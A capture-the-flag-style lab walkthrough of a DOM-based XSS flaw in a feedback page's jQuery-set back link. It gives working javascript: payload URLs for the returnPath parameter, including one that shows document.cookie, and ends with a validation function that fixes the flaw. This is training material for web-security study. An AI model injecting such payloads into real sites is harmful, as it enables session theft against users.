📌 Info

This lab contains a DOM-based cross-site scripting (XSS) vulnerability in the submit feedback page.

It uses the jQuery library's $ selector function to find an anchor element, and changes its href attribute using data from location.search.


🎯 Goal

Make the "back" link alert document.cookie.


⚠️ Vulnerable Code

The page has a Go Back link that is updated with jQuery code like this:

$('a#backLink').attr('href', new URLSearchParams(location.search).get('returnPath'));


🛠️ Exploitation Steps

  1. Normal feedback URL:

    <https://0ad4007004b024ff80b5b2a600a2002c.web-security-academy.net/feedback?returnPath=/>
    
    
  2. Inject JavaScript into the returnPath parameter:

    <https://0ad4007004b024ff80b5b2a600a2002c.web-security-academy.net/feedback?returnPath=javascript:alert(1)>
    
    

    → The Back link’s href becomes:

    <a id="backLink" href="javascript:alert(1)">Back</a>
    
    
  3. For the lab’s goal, modify the payload to display the cookies:

    <https://0ad4007004b024ff80b5b2a600a2002c.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)>
    
    
  4. When you click the Back link → the browser executes the JavaScript → document.cookie is displayed.
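The fix for this sink is to validate returnPath before it reaches the href attribute. The following is an added example, not code from the lab: `safeReturnPath` and `ORIGIN` are hypothetical names, and `https://shop.example` is a constructed placeholder origin. It only accepts values that resolve to an http(s) URL on the page's own origin, so `javascript:` URLs and off-site links fall back to `/`.

```javascript
// Added example: validate returnPath before using it as a link target.
// ORIGIN and safeReturnPath are hypothetical names, not part of the lab.
const ORIGIN = 'https://shop.example'; // constructed placeholder origin

function safeReturnPath(search, origin = ORIGIN) {
  const raw = new URLSearchParams(search).get('returnPath');
  if (raw === null) return '/';

  // Backslashes and control characters are normalised by URL parsers
  // (tabs/newlines are stripped), so reject them outright.
  if (/[\\\u0000-\u001f]/.test(raw)) return '/';

  let url;
  try {
    // Relative paths resolve against origin; absolute URLs keep their own scheme.
    url = new URL(raw, origin);
  } catch {
    return '/';
  }

  // Scheme allowlist: blocks javascript:, data:, vbscript:, etc.
  // The parser lowercases the scheme, so mixed case is covered.
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return '/';

  // Same-origin only: blocks //other.host/ and absolute off-site URLs.
  if (url.origin !== origin) return '/';

  // Return a path-only value so the link can never leave the site.
  return url.pathname + url.search + url.hash;
}

// In the page, the sink would become:
// $('a#backLink').attr('href', safeReturnPath(location.search, location.origin));
```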